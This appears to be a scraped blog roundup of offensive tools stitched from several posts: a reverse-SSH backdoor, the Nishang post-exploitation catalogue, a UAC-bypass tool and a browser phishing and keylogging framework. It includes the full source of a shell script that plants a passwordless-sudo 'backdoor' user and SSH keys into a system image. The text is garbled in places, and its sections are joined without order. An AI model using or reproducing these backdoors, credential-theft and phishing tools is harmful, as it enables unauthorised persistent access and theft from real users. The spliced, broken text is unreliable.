sidedoor is a Backdoor using a reverse SSH tunnel on Debian/Ubuntu systems.
sidedoor maintains a reverse SSH tunnel to provide a backdoor. sidedoor can be used to remotely control a device behind a NAT. The sidedoor user has full root access configured in /etc/sudoers.d.

Howto:
1. Install sidedoor. For now, sudo dpkg -i sidedoor*.deb. You3. can build a package by running dpkg-buildpackage -us -uc -b.
2. Optionally, lock down the local SSH server by disabling password authentication (ChallengeResponseAuthentication no and PasswordAuthentication no) and listening only on localhost (ListenAddress ::1 and ListenAddress 127.0.0.1) in /etc/ssh/sshd_config. Then restart or reload sshd, e.g., sudo service ssh reload.
3. Configure REMOTE_SERVER and TUNNEL_PORT in /etc/default/sidedoor.
4. Install an SSH private key to access the remote server in /var/lib/sidedoor/.ssh/id_rsa. The corresponding public key will need to be included in the remote user’s ~/.ssh/authorized_keys file.
5. Install SSH public key(s) to control access to the local sidedoor user in /var/lib/sidedoor/.ssh/authorized_keys.
6. Restart sidedoor service, e.g., sudo service sidedoor restart.
7. Optionally, modify ssh_config_example and include it in a client’s ~/.ssh/config file to easily access the tunnelled backdoor.

Usage:

git clone https://github.com/daradib/sidedoor
cd sidedoor
./sidedoor

Source: https://github.com/daradib

Changelog v0.6.2:
+ Added support for dumping cleartext credentials from RDP sessions for Invoke-MimikatzWfigestDowngrade.
– fix issues #29.DESCRIPTION
This script uses MJPEG to stream a target’s desktop in real time. It is able to connect to a standard netcat listening on a port when using the -Reverse switch. Also, a standard netcat can connect to this script Bind to a specific port.
A netcat listener which relays connection to a local port could be used as listener. A browser which supports MJPEG (Firefox) should then be pointed to the local port to see the remote desktop.

Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security and penetration testing. Nishang is useful during various phases of a penetration test and is most powerful for post exploitation usage.

Nishang v-0.6.2 released: PowerShell for penetration testing and offensive security.

Scripts; Nishang currently contains the following scripts and payloads.
+ Antak – the Webshell
– Antak :Execute PowerShell scripts in memory, run commands, and download and upload files using this webshell

+ Backdoors
– HTTP-Backdoor : A backdoor which can receive instructions from third party websites and execute PowerShell scripts in memory.
– DNS_TXT_Pwnage : A backdoor which can receive commands and PowerShell scripts from DNS TXT queries, execute them on a target, and be remotely controlled using the queries.
– Execute-OnTime : A backdoor which can execute PowerShell scripts at a given time on a target.
– Gupt-Backdoor : A backdoor which can receive commands and scripts from a WLAN SSID without connecting to it.
– Add-ScrnSaveBackdoor : A backdoor which can use Windows screen saver for remote command and script execution.
– Invoke-ADSBackdoor : A backdoor which can use alternate data streams and Windows Registry to achieve persistence.

+ Client
– Out-CHM : Create infected CHM files which can execute PowerShell commands and scripts.
– Out-Word : Create Word files and infect existing ones to run PowerShell commands and scripts.
– Out-Excel : Create Excel files and infect existing ones to run PowerShell commands and scripts.
– Out-HTA : Create a HTA file which can be deployed on a web server and used in phishing campaigns.
– Out-Java : Create signed JAR files which can be used with applets for script and command execution.
– Out-Shortcut : Create shortcut files capable of executing commands and scripts.
– Out-WebQuery : Create IQY files for phishing credentials and SMB hashes.

+ Escalation
– Enable-DuplicateToken : When SYSTEM privileges are required.
– Remove-Update : Introduce vulnerabilities by removing patches.

+ Execution
– Download-Execute-PS : Download and execute a PowerShell script in memory.
– Download_Execute : Download an executable in text format, convert it to an executable, and execute.
– Execute-Command-MSSQL : Run PowerShell commands, native commands, or SQL commands on a MSSQL Server with sufficient privileges.
– Execute-DNSTXT-Code : Execute shellcode in memory using DNS TXT queries.

+ Gather
– Check-VM : Check for a virtual machine.
– Copy-VSS : Copy the SAM file using Volume Shadow Copy Service.
– Invoke-CredentialsPhish : Trick a user into giving credentials in plain text.
– FireBuster FireListener: A pair of scripts for egress testing
– Get-Information : Get juicy information from a target.
– Get-LSASecret : Get LSA Secret from a target.
– Get-PassHashes : Get password hashes from a target.
– Get-WLAN-Keys: Get WLAN keys in plain text from a target.

+ Keylogger
Log keystrokes from a target.
– Invoke-MimikatzWdigestDowngrade: Dump user passwords in plain on Windows 8.1 and Server 2012
– Get-PassHints : Get password hints of Windows users from a target.

+ Pivot
– reate-MultipleSessions : Check credentials on multiple computers and create PSSessions.
– Run-EXEonRemote Copy and execute an executable on multiple machines.
– Invoke-NetworkRelay Create network relays between computers.

+ Prasadhak
– Prasadhak : Check running hashes of running process against the VirusTotal database.

+ Scan
– Brute-Force : Brute force FTP, Active Directory, MSSQL, and Sharepoint.
– Port-Scan : A handy port scanner

+ Powerpreter
Powerpreter : All the functionality of nishang in a single script module.

+ Shells :
– Invoke-PsGcat: Send commands and scripts to specifed Gmail account to be executed by Invoke-PsGcatAgent
– Invoke-PsGcatAgent: Execute commands and scripts sent by Invoke-PsGcat.
– Invoke-PowerShellTcp: An interactive PowerShell reverse connect or bind shell
– Invoke-PowerShellTcpOneLine : Stripped down version of Invoke-PowerShellTcp. Also contains, a skeleton version which could fit in two tweets.
– Invoke-PowerShellUdp : An interactive PowerShell reverse connect or bind shell over UDP
– Invoke-PowerShellUdpOneLine : Stripped down version of Invoke-PowerShellUdp.
– Invoke-PoshRatHttps : Reverse interactive PowerShell over HTTPS.
– Invoke-PoshRatHttp : Reverse interactive PowerShell over HTTP.
– Remove-PoshRat : Clean the system after using Invoke-PoshRatHttps
– Invoke-PowerShellWmi : Interactive PowerShell using WMI.
– Invoke-PowerShellIcmp : An interactive PowerShell reverse shell over ICMP.

+ Utility:
– Add-Exfiltration: Add data exfiltration capability to Gmail, Pastebin, a web server, and DNS to any script.
– Add-Persistence: Add reboot persistence capability to a script.
– Remove-Persistence: Remote persistence added by the Add-Persistence script.
– Do-Exfiltration: Pipe (|) this to any script to exfiltrate the output.
– Download: Transfer a file to the target.
– Parse_Keys : Parse keys logged by the keylogger.
– Invoke-Encode : Encode and compress a script or string.
– Invoke-Decode : Decode and decompress a script or string from Invoke-Encode.
– Start-CaptureServer : Run a web server which logs Basic authentication and SMB hashes.
— [Base64ToString] [StringToBase64] [ExetoText] [TexttoExe]

Download : Nishang.zip(951 KB) | Our Post Before
Source : http://www.labofapenetrationtester.com/

NOTICE : This post and script for research Purpose Only!
backdoor-image is a ‘backdoor’ user to a image or filesystem at ‘target’.
File lists:
+ backdoor-image.sh add a ‘backdoor’ user to a image or filesystem at ‘target’

backdoor-image.sh

mount-callback-umount

+ mount-callback-umount : mount a file to a temporary mount point and then invoke the provided cmd with args, the temporary mountpoint will be put in an a environment variable named MOUNTPOINT

Usage:

git clone https://github.com/Crazykev/backdoor-image && cd backdoor-image
chmod +x backdoor-image.sh
chmod +x mount-callback-umount

backdoor-image.sh Script:

#!/bin/bash

VERBOSITY=0
TEMP_D=""
DEFAULT_USER="backdoor"

error() { echo "$@" 1>&2; }

Usage() {
	cat <<EOF
Usage: ${0##*/} [ options ] target
   add a 'backdoor' user to a image or filesystem at 'target'
   options:
      --import-id U      use 'ssh-import-id' to get ssh public keys
                         may be used more than once.
      --force            required to operate on / filesystem
      --password P       set password P, implies --password-auth
      --password-auth    enable password auth
      --pubkeys  F       add public keys from file 'F'
                         default: ~/.ssh/id_rsa.pub unless --password
                         or --import-id specified
      --user      U      use user 'U' (default: '${DEFAULT_USER}')
EOF
}

bad_Usage() { Usage 1>&2; [ $# -eq 0 ] || error "$@"; exit 1; }
cleanup() {
	[ -z "${TEMP_D}" -o ! -d "${TEMP_D}" ] || rm -Rf "${TEMP_D}"
}

debug() {
	local level=${1}; shift;
	[ "${level}" -gt "${VERBOSITY}" ] && return
	error "${@}"
}

mod_sshd_bool() {
	local cfg="$1" kn="$2" target="$3" dry=${4:-false}
	local ws=$' \t' msg=""
	local match="^\([#]\{0,1\}\)[#$ws]*$kn\([$ws]\+\)\(yes\|no\)"
	local cur="" hsh="#"
	cur=$(sed -n "s/$match/\1\3/p" "$cfg") ||
		{ error "failed to read $cfg"; return 1; }
	if [ -n "$cur" ]; then
		case "$cur" in
			"#$target") msg="uncommenting, '$target' line";;
			"#*") msg="uncommenting, changing '{cur#$hsh}' to '$target'";;
			"$target") msg="nochange";;
			"*") msg="changing '$cur' to '$target'";;
		esac
		if [ "$msg" = "nochange" ]; then
			debug 1 "no change to $cfg necessary"
		else
			debug 1 "updating $cfg: $msg"
			$dry && return
			sed -i "s/$match/$kn\2${target}/" "$cfg" ||
				{ error "failed to update $cfg"; return 1; }
		fi
	else
		debug 1 "appending entry for '$kn $target' to $cfg"
		$dry && return
		echo "$kn $target" >> "$cfg" ||
			{ error "failed to append entry to $cfg"; return 1; }
	fi
	return 0
}

test_mod_sshd_cfg() {
	local kn="PasswordAuthentication"
	echo "#$kn   yes" > f1
	echo "#$kn  no" > f2
	echo "$kn yes" > f3
	echo "$kn no" > f4
	: > f5
	for f in f1 f2 f3 f4 f5; do
		mod_sshd_bool "$f" PasswordAuthentication yes true
	done
}

add_group_ent() {
	local group="$1" gid="$2" fgroup="$3" dry="${4:-false}"
	local grent="$group:x:$gid:"
	if grep -q "^$group:" "$fgroup"; then
		debug 1 "remove $group from group file"
		$dry || sed -i "/^$group:/d" "$fgroup" ||
			{ error "failed to remove user from group"; return 1; }
	fi

	debug 1 "append entry to group: $grent"
	if ! $dry; then
		echo "$grent" >> "$fgroup" ||
			{ error "failed to update group file"; return 1; }
	fi
	return 0
}

add_passwd_ent() {
	local user="$1" uid="$2" gid="$3" home="$4" fpasswd="$5" dry=${6:-false}

	if grep -q "^$user:" "$fpasswd"; then
		debug 1 "remove $user from password file"
		$dry || sed -i "/^$user:/d" "$fpasswd" ||
			{ error "failed to remove user from password file"; return 1; }
	fi

	local pwent="$user:x:$uid:$gid:backdoor:$home:/bin/bash"
	debug 1 "append entry to passwd: $pwent"
	if ! $dry; then
		echo "$pwent" >> "$fpasswd" ||
			{ error "failed to update passwd file"; return 1; }
	fi
}

encrypt_pass() {
	local pass="$1" fmt="${2-\$6\$}"
	enc=$(echo "$pass" |
		perl -e '
			$p=<STDIN>; chomp($p);
			$salt = join "", map { (q(a)..q(z))[rand(26)] } 1 .. 8;
			if (${ARGV[0]}) { $salt = "${ARGV[0]}$salt\$"; }
			print crypt($p, "$salt") . "\n";' "$fmt") || return
	[ -n "${enc}" ] && [ -z "${fmt}" -o "${enc#${fmt}}" != "${fmt}" ] &&
	_RET="$enc"
}

add_shadow_ent() {
	local user="$1" pass="$2" fshadow="$3" dry="$4"
	local encrypt_pre="\$6\$" shent="" encpass="" pwchange=""

	# if input was '$6$' format, just use it verbatum
	if [ "${pass#${encrypt_pre}}" != "${pass}" ]; then
		debug 1 "using encrypted password from cmdline"
		encpass="$pass"
	else
		encrypt_pass "$pass" && encpass="$_RET" ||
			{ error "failed to encrypt password"; return 1; }
	fi

	# pwchange is number of days since 1970
	pwchange=$(($(date +"(%Y-1970)*365 + 10#%j")))
	shent="$user:$encpass:$pwchange:0:99999:7:::"

	if grep -q "^$user:" "$fshadow"; then
		debug 1 "remove $user from shadow file"
		$dry || sed -i "/^$user:/d" "$fshadow" ||
			{ error "failed to remove user from shadow"; return 1; }
	fi

	debug 1 "append entry to shadow: $shent"
	if ! $dry; then
		echo "$shent" >> "$fshadow" ||
			{ error "failed to update shadow file"; return 1; }
	fi
	return 0

}

add_sudo_ent() {
	local user="$1" mp="$2" dry="$3"

	local target="/etc/sudoers.d/99-$user"

	local ent="$user ALL=(ALL) NOPASSWD:ALL"
	local start="#BACKDOOR_START_${user}"
	local end="#BACKDOOR_end_${user}"
	local content=$(printf "%s\n%s\n%s\n" "$start" "$ent" "$end")

	if [ -f "$mp/etc/lsb-release" ] &&
		grep -i lucid -q "$mp/etc/lsb-release"; then
		target="/etc/sudoers"
		debug 2 "$mp does not seem to support sudoers.d"
		debug 1 "add sudoers ($mp,$target): $ent"
		if grep -q "^$start$" "$mp/$target"; then
			debug 2 "removing $user entry from $target"
			if ! $dry; then
				sed -i "/^${start}$/,/^${end}$/d" "$target" ||
					{ error "failed update $target"; return 1; }
			fi
		fi
		if ! $dry; then
			( umask 226 && echo "$content" >> "$mp/$target" ) ||
				{ error "failed to add sudoers entry to $target"; return 1; }
		fi
	else
		debug 1 "add sudoers ($mp,$target): $ent"
		if ! $dry; then
			rm -f "$mp/$target" &&
				( umask 226 && echo "$content" > "$mp/$target" ) ||
				{ error "failed to add sudoers entry to $target"; return 1; }
		fi
	fi
}

add_user() {
	local user="$1" pass="$2" uid="$3" gid="$4" home="$5"
	local rootd="$6" dry="${7:-false}"
	local fpasswd="$rootd/etc/passwd" fshadow="$rootd/etc/shadow"
	local fgroup="$rootd/etc/group"

	[ -f "$fpasswd" ] || { error "no password file"; return 1; }
	[ -f "$fshadow" ] || { error "no shadow file"; return 1; }
	[ -f "$fgroup" ] || { error "no group file"; return 1; }

	local group="$user" f="" t=""
	
	add_passwd_ent "$user" "$uid" "$gid" "$home" "$fpasswd" "$dry" || return 1
	add_group_ent "$group" "$gid" "$fgroup" "$dry" || return 1
	add_shadow_ent "$user" "$pass" "$fshadow" "$dry" || return 1

	debug 1 "create $rootd/home/$user"
	if ! $dry; then
		mkdir -p "$rootd/home/$user" &&
			chown $uid:$gid "$rootd/home/$user" ||
			{ error "failed to make home dir"; return 1; }
		for f in "$rootd/etc/skel/".* "$rootd/etc/skel/"*; do
			[ -e "$f" ] || continue
			t="$rootd/home/$user/${f##*/}"
			[ ! -e "$t" ] || continue
			cp -a "$f" "$t" && chown -R "$uid:$gid" "$t" ||
				{ error "failed to copy $f to $t"; return 1; }
		done
	fi
}

add_user_keys() {
	local keys="$1" dir="$2" ownership="$3" dry="${4:-false}"
	debug 1 "add ssh keys to $dir with $ownership"
	$dry && return
	mkdir -p "$dir" &&
		cp "$keys" "$dir/authorized_keys" &&
		chmod 600 "$dir/authorized_keys" &&
		chown "$ownership" "$dir" "$dir/authorized_keys" &&
		chmod 700 "$dir" ||
		{ error "failed to add user keys"; return 1; }
	if [ $VERBOSITY -ge 1 ]; then
		debug 1 "added ssh keys:"
		sed "s,^,| ," "$keys"
	fi
}

gen_ssh_keys() {
	local mp="$1" types="${2:-rsa}" dry="${3:-false}"
	local ktype="" file="" ftmpl="/etc/ssh/ssh_host_%s_key" out=""
	for ktype in $types; do
		file=${ftmpl//%s/$ktype}
		if [ -f "$mp/$file" ]; then
			debug 2 "existing key for $mp/$file"
			continue
		fi
		debug 1 "ssh-keygen -t $ktype -N '' -f '$file' -C backdoor"
		$dry && continue
		out=$(ssh-keygen -t "$ktype" -N '' -f "$mp/$file" -C backdoor 2>&1) || {
			error "$out"
			error "failed generate keytype $ktype";
			return 1;
		}
		out=$(ssh-keygen -l -f "$mp/$file")
		debug 1 "$out"
	done
}

apply_changes() {
	local mp="$1" user="$2" password="$3" pwauth="$4" pubkeys="$5"
	local dry="${6:-false}"
	local home="/home/$user" key=""
 	local uid="9999" gid="9999"

	local sshcfg="$mp/etc/ssh/sshd_config"
	[ -f "$sshcfg" ] || 
		{ error "$sshcfg did no exist"; return 1; }

	key="PubkeyAuthentication"
	mod_sshd_bool "$sshcfg" "$key" "yes" "$dry" ||
		{ error "failed to set $key to yes"; return 1; }

	if $pwauth; then
		key="PasswordAuthentication"
		mod_sshd_bool "$sshcfg" "$key" "yes" "$dry" ||
			{ error "failed to set $key to yes"; return 1; }
	fi

	gen_ssh_keys "$mp" "rsa" "$dry" || return 1

	add_user "$user" "$password" "$uid" "$gid" "$home" "$mp" "$dry" || return 1

	[ -z "$pubkeys" ] ||
		add_user_keys "$pubkeys" "$mp/$home/.ssh" "$uid:$gid" || return 1

	add_sudo_ent "$user" "$mp" "$dry" || return 1

}

main() {
	short_opts="hv"
	long_opts="help,dry-run,force,import-id:,password:,password-auth,pubkeys:,user:,verbose"
	getopt_out=$(getopt --name "${0##*/}" \
		--options "{short_opts}" --long "${long_opts}" -- "$@") &&
		eval set -- "${getopt_out}" ||
		bad_Usage

	local user="" password="" pwauth=false pubkeys="" import_ids="" dry=false
	local target="" pkfile="" force=false
	user="${DEFAULT_USER}"

	local args=""
	args=( "$@" )
	unset args[${#args[@]}-1]

	while [ $# -ne 0 ]; do
		cur=${1}; next=${2};
		case "$cur" in
			-h|--help) Usage ; exit 0;;
			   --dry-run) dry=true;;
			   --force) force=true;;
			   --import-id)
					import_ids="${import_ids:+${import_ids} }$next";
					shift;;
			   --password) password=$next; shift;;
			   --password-auth) pwauth=true;;
			   --pubkeys) pubkeys=$next; shift;;
			   --user) user=$next; shift;;
			-v|--verbose) VERBOSITY=$((${VERBOSITY}+1));;
			--) shift; break;;
		esac
		shift;
	done

	[ $# -ne 0 ] || { bad_Usage "must provide image"; return 1; }
	[ $# -ge 2 ] && { bad_Usage "too many arguments: $*"; return 1; }

	[ "$(id -u)" = "0" ] || 
		{ error "sorry, must be root"; return 1; }

	target="$1"
	if [ -d "$target" ]; then
		if [ "$target" -ef "/" ] && ! $force; then
			error "you must specify --force to operate on /"
			return 1
		fi
	elif [ -f "$target" ]; then
		local vopt="" mcu="mount-callback-umount"
		if [ ${VERBOSITY} -ge 2 ]; then
			vopt="-v"
		fi
		if ! command -v "$mcu" >/dev/null 2>&1; then
			if [ -x "${0%/*}/$mcu" ]; then
				PATH="${0%/*}:$PATH"
			elif command -v "mount-image-callback" >/dev/null 2>&1; then
				mcu="mount-image-callback"
			else
				error "No '$mcu' or 'mount-image-callback' in PATH"
				return 1
			fi
		fi
		exec "$mcu" $vopt -- "$target" "$0" "${args[@]}" _MOUNTPOINT_
	else
		[ -f "$target" ] || { error "$target: not a file"; return 1; }
	fi

	if [ -n "$password" ] && ! which perl >/dev/null 2>&1; then
		{ error "perl required for making password"; return 1; }
		pwauth=true
	fi

	{ [ -z "$import_ids" ] || which ssh-import-id >/dev/null 2>&1; } ||
		{ error "you do not have ssh-import-id"; return 1; }

	TEMP_D=$(mktemp -d "${TMPDIR:-/tmp}/${0##*/}.XXXXXX") ||
		{ error "failed to make tempdir"; return 1; }
	trap cleanup EXIT

	pkfile="${TEMP_D}/pubkeys"
	if [ -z "$password" -a -z "$pubkeys" -a -z "$import_ids" ]; then
		[ -f ~/.ssh/id_rsa.pub ] || {
			error "must specify one of --password, --pubkeys, --import-id"
			error "either pass an argument or create ~/.ssh/id_rsa.pub"
			return 1
		}
		debug 1 "set pubkeys to ~/.ssh/id_rsa.pub"
		pubkeys=$(echo ~/.ssh/id_rsa.pub)
	fi

	if [ -n "$pubkeys" ]; then
		cp "$pubkeys" "$pkfile" ||
			{ error "failed to copy $pubkeys"; return 1; }
	fi

	if [ -n "$import_ids" ]; then
		ssh-import-id --output "$pkfile.i" ${import_ids} &&
			cat "$pkfile.i" >> "$pkfile" ||
			{ error "failed to import ssh users: $import_ids"; return 1; }
	fi

	[ -f "$pkfile" ] || pkfile=""

	apply_changes "$target" "$user" "$password" "$pwauth" "$pkfile"
	[ $? -eq 0 ] || { error "failed to apply changes"; return 1; }

	error "added user '$user' to $target"
	[ -n "$password" ] && error "set password to $password."
	$pwauth && error "enabled password auth" ||
		error "did not enable password auth"
	[ -n "$pubkeys" ] && error "added pubkeys from $pubkeys."
	[ -n "$import_ids" ] && error "imported ssh keys for $import_ids"
	return 0
}

main "$@"

# vi: ts=4 noexpandtab

mount-callback-umount Script:

#!/bin/bash

VERBOSITY=0
TEMP_D=""
UMOUNT=""
QEMU_DISCONNECT=""

error() { echo "$@" 1>&2; }

Usage() {
	cat <<EOF
Usage: ${0##*/} [ options ] file cmd [ args ]
   mount a file to a temporary mount point and then
   invoke the provided cmd with args
   the temporary mountpoint will be put in an a environment variable
   named MOUNTPOINT.
   if any of the arguments are the literal string '_MOUNTPOINT_', then
   they will be replaced with the mount point. Example:
      ${0##*/} my.img chroot _MOUNTPOINT_ /bin/sh
   options:
    -v | --verbose             increase verbosity
         --read-only           use read-only mount.
    -p | --proc                bind mount /proc
    -s | --sys                 bind mount /sys
    -d | --dev                 bind mount /dev
         --system-mounts       bind mount /sys, /proc, /dev
         --system-resolvconf   copy host's resolvconf into /etc/resolvconf
EOF
}

# umount_r(mp) : unmount any filesystems under r
#  this is useful to unmount a chroot that had sys, proc ... mounted
umount_r() {
	local p
	for p in "$@"; do
		[ -n "$p" ] || continue
		tac /proc/mounts | sh -c '
			p=$1
			while read s mp t opt a b ; do
				[ "${mp}" = "${p}" -o "${mp#${p}/}" != "${mp}" ] ||
					continue
				umount "$mp" || exit 1
			done
			exit 0' umount_r "${p%/}"
		[ $? -eq 0 ] || return
	done
}

bad_Usage() { Usage 1>&2; [ $# -eq 0 ] || error "$@"; exit 1; }
cleanup() {
	if [ -n "$UMOUNT" ]; then
		umount_r "$UMOUNT" ||
			error "WARNING: unmounting filesystems failed!"
	fi
	if [ -n "$QEMU_DISCONNECT" ]; then
		local out=""
		out=$(qemu-nbd --disconnect "$QEMU_DISCONNECT" 2>&1) || {
			error "warning: failed: qemu-nbd --disconnect $QEMU_DISCONNECT"
			error "$out"
		}
	fi
	[ -z "${TEMP_D}" -o ! -d "${TEMP_D}" ] ||
		rm --one-file-system -Rf "${TEMP_D}" ||
		error "removal of temp dir failed!"
}

debug() {
	local level="$1"; shift;
	[ "${level}" -gt "${VERBOSITY}" ] && return
	error "${@}"
}

mount_callback_umount() {
	local img_in="$1" dev="" out="" mp="" ret="" img="" ro=""
	local opts="" bmounts="" system_resolvconf=false

	short_opts="dhpsv"
	long_opts="dev,help,proc,read-only,sys,system-mounts,system-resolvconf,verbose"
	getopt_out=$(getopt --name "${0##*/}" \
		--options "{short_opts}" --long "${long_opts}" -- "$@") &&
		eval set -- "${getopt_out}" ||
		{ bad_Usage; return 1; }

	while [ $# -ne 0 ]; do
		cur=${1}; next=${2};
		case "$cur" in
			-d|--dev) bmounts="${bmounts:+${bmounts} /dev}";;
			-h|--help) Usage ; exit 0;;
			-p|--proc) bmounts="${bmounts:+${bmounts} /proc}";;
			-s|--sys) bmounts="${bmounts:+${bmounts} /sys}";;
			   --system-mounts) bmounts="/dev /proc /sys";;
			   --system-resolvconf) system_resolvconf=true;;
			-v|--verbose) VERBOSITY=$((${VERBOSITY}+1));;
			   --opts) opts="${opts} $next"; shift;;
			   --read-only) ro="ro";;
			--) shift; break;;
		esac
		shift;
	done

	[ $# -ge 2 ] || { bad_Usage "must provide image and cmd"; return 1; }

	[ -n "$ro" ] && $system_resolvconf && {
		error "--read-only is incompatible with system-resolvconf";
		return 1;
	}

	img_in="$1"
	shift 1

	img=$(readlink -f "$img_in") ||
		{ error "failed to get full path to $img_in"; return 1; }

	[ "$(id -u)" = "0" ] || 
		{ error "sorry, must be root"; return 1; }

	TEMP_D=$(mktemp -d "${TMPDIR:-/tmp}/${0##*/}.XXXXXX") ||
		{ error "failed to make tempdir"; return 1; }
	trap cleanup EXIT

	mp="${TEMP_D}/mp"

	mkdir "$mp" || return

	local cmd="" arg="" found=false
	cmd=( )
	for arg in "$@"; do
		if [ "${arg}" = "_MOUNTPOINT_" ]; then
			debug 1 "replaced string _MOUNTPOINT_ in arguments arg ${#cmd[@]}"
			arg=$mp
		fi
		cmd[${#cmd[@]}]="$arg"
	done

	if [ "{cmd[0]##*/}" = "bash" -o "{cmd[0]##*/}" = "sh" ] &&
	   [ ${#cmd[@]} -eq 0 ]; then
		debug 1 "invoking shell {cmd[0]}"
		error "MOUNTPOINT=$mp"
	fi

	local hasqemu=false
	command -v "qemu-nbd" >/dev/null 2>&1 && hasqemu=true

	if out=$(set -f; mount -o loop{ro:+,$ro} $opts \
	         "$img" "$mp" 2>&1); then
		debug 1 "mounted simple filesystem image '$img_in'"
		UMOUNT="$mp"
	else
		if ! $hasqemu; then
			error "simple mount of '$img_in' failed."
			error "if this not a raw image, or it is partitioned"
			error "you must have qemu-nbd (apt-get install qemu-utils)"
			error "mount failed with: $out"
			return 1
		fi
	fi

	if [ -z "$UMOUNT" ]; then
		if [ ! -e /sys/block/nbd0 ] && ! grep -q nbd /proc/modules; then
			debug 1 "trying to load nbd module"
			modprobe nbd >/dev/null 2>&1
			udevadm settle >/dev/null 2>&1
		fi
		[ -e /sys/block/nbd0 ] || {
			error "no nbd kernel support, but simple mount failed"
			return 1;
		}

		local f nbd=""
		for f in /sys/block/nbd*; do
			[ -d "$f" -a ! -f "$f/pid" ] && nbd=${f##*/} && break
		done
		if [ -z "$nbd" ]; then
			error "failed to find an nbd device"
			return 1;
		fi
		nbd="/dev/$nbd"

		if ! qemu-nbd --connect "$nbd" "$img"; then
			error "failed to qemu-nbd connect $img to $nbd"
			return 1
		fi
		QEMU_DISCONNECT="$nbd"

		local pfile="/sys/block/${nbd#/dev/}/pid"
		if [ ! -f "$pfile" ]; then
			debug 1 "waiting on pidfile for $nbd in $pfile"
			local i=0
			while [ ! -f "$pfile" ] && i=$(($i+1)); do
				if [ $i -eq 200 ]; then
					error "giving up on pidfile $pfile for $nbd"
					return 1
				fi
				sleep .1
				debug 2 "."
			done
		fi

		debug 1 "connected $img_in to $nbd. now udev-settling"
		udevadm settle >/dev/null 2>&1

		local mdev="$nbd"
		if [ -b "${nbd}p1" ]; then
			mdev="${nbd}p1"
		fi
		if ( set -f; mount {ro:+-o ${ro}} $opts "$mdev" "$mp" ) &&
			UMOUNT="$mp"; then
			debug 1 "mounted $mdev via qemu-nbd $nbd"
		else
			local pid="" pfile="/sys/block/${nbd#/dev/}/pid"
			{ read pid < "$pfile" ; } >/dev/null 2>&1
			[ -n "$pid" -a ! -d "/proc/$pid" ] ||
				error "qemu-nbd process seems to have died. was '$pid'"

			qemu-nbd --disconnect "$nbd" && QEMU_DISCONNECT=""
			error "failed to mount $mdev"
			return 1
		fi

	fi

	local bindmp=""
	for bindmp in $bmounts; do
		[ -d "$mp${bindmp}" ] || mkdir "$mp${bindmp}" ||
			{ error "failed mkdir $bindmp in mount"; return 1; }
		mount --bind "$bindmp" "$mp/${bindmp}" ||
			{ error "failed bind mount '$bindmp'"; return 1; }
	done

	if ${system_resolvconf}; then
		local rcf="$mp/etc/resolv.conf"
		debug 1 "replacing /etc/resolvconf"
		if [ -e "$rcf" -o -L "$rcf" ]; then
			local trcf="$rcf.${0##*/}.$$"
			rm -f "$trcf" &&
				mv "$rcf" "$trcf" && ORIG_RESOLVCONF="$trcf" ||
				{ error "failed mv $rcf"; return 1; }
		fi
		cp "/etc/resolv.conf" "$rcf" ||
			{ error "failed copy /etc/resolv.conf"; return 1; }
	fi

	debug 1 "invoking: MOUNTPOINT=$mp" "{cmd[@]}"
	MOUNTPOINT="$mp" "{cmd[@]}"
	ret=$?

	if ${system_resolvconf}; then
		local rcf="$mp/etc/resolv.conf"
		cmp --quiet "/etc/resolv.conf" "$rcf" >/dev/null ||
			error "WARN: /etc/resolv.conf changed in image!"
		rm "$rcf" &&
			{ [ -z "$ORIG_RESOLVCONF" ] || mv "$ORIG_RESOLVCONF" "$rcf"; } ||
			{ error "failed to restore /etc/resolv.conf"; return 1; }
	fi

	debug 1 "cmd returned $ret. unmounting $mp"
	umount_r "$mp" || { error "failed umount $img"; return 1; }
	UMOUNT=""
	rmdir "$mp"

	if [ -n "$QEMU_DISCONNECT" ]; then
		local out=""
		out=$(qemu-nbd --disconnect "$QEMU_DISCONNECT" 2>&1) &&
			QEMU_DISCONNECT="" || {
				error "failed to disconnect $QEMU_DISCONNECT";
				error "$out"
				return 1;
		}
	fi
	return $ret
}

mount_callback_umount "$@"

# vi: ts=4 noexpandtab

Source : https://github.com/Crazykev

LynxFramework is an operating tool for web browser offering a specialized service in the effect browser extension development , namely Google Chrome and Firefox soon. The operation is based on the script for the injection in the order to retrieve data targeted.

LynxFramework:
has been tested on windows, MaxOSX, Ubuntu, And Kali 2.0

ONLINE PAYLOAD:
+ XSSKeylooger keylooger xss
+ ForceDownload force file download
+ paytoweb www.paytoweb.com
+ Paypal https://www.paypal.com/signin/
+ Facebook http://facebook.com

usage:

git clone https://github.com/graniet/LynxFramework && cd LynxFramework
python LynxFramework.py
set:payload (what do you want)
then open your chrome browser..

Source: https://github.com/graniet | https://lynxframework.com/

BypassUAC is a Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.

System Requirements
1.x86-32/x64 Windows 7/8/8.1/10 (client, some methods however works on server version too).
2.Admin account with UAC set on default settings required.

BypassUAC

Usage
Run executable from command line: BypassUAC_x86 [Key] [Param] or BypassUAC_x64 [Key] [Param]. See “Run examples” below for more info.
First param is number of method to use, second is optional command (executable file name including full path) to run. Second param can be empty – in this case program will execute elevated cmd.exe from system32 folder.
Keys (watch debug ouput with dbgview or similar for more info):
1 – Leo Davidson sysprep method, this will work only on Windows 7 and Windows 8, used in multiple malware;
2 – Tweaked Leo Davidson sysprep method, this will work only on Windows 8.1.9600;
3 – Leo Davidson method tweaked by WinNT/Pitou developers, works from Windows 7 up to 10th2 10532;
4 – Application Compatibility Shim RedirectEXE method, from WinNT/Gootkit. Works from Windows 7 up to 8.1.9600;
5 – ISecurityEditor WinNT/Simda method, used to turn off UAC, works from Windows 7 up to Windows 10th1 100136;
6 – Wusa method used by Win32/Carberp, tweaked to work with Windows 8/8.1 also;
7 – Wusa method, tweaked to work from Windows 7 up to 10th1 10136;
8 – Slightly modified Leo Davidson method used by Win32/Tilon, works only on Windows 7;
9 – Hybrid method, combination of WinNT/Simda and Win32/Carberp + AVrf, works from Windows 7 up to 10th1 10136;
10 – Hybrid method, abusing appinfo.dll way of whitelisting autoelevated applications and KnownDlls cache changes, works from Windows 7 up to 10th2 10532;
11 – WinNT/Gootkit second method based on the memory patching from MS “Fix it” patch shim (and as side effect – arbitrary dll injection), works from Windows 7 up to 8.1.9600;
12 – Windows 10 sysprep method, abusing different dll dependency added in Windows 10 (works up to 10th2 10558);
13 – Hybrid method, abusing appinfo.dll way of whitelisting MMC console commands and EventViewer missing dependency, works from Windows 7 up to 10rs1 11082;
14 – WinNT/Sirefef method, abusing appinfo.dll way of whitelisting OOBE.exe, works from Windows 7 up to 10th2 10558;
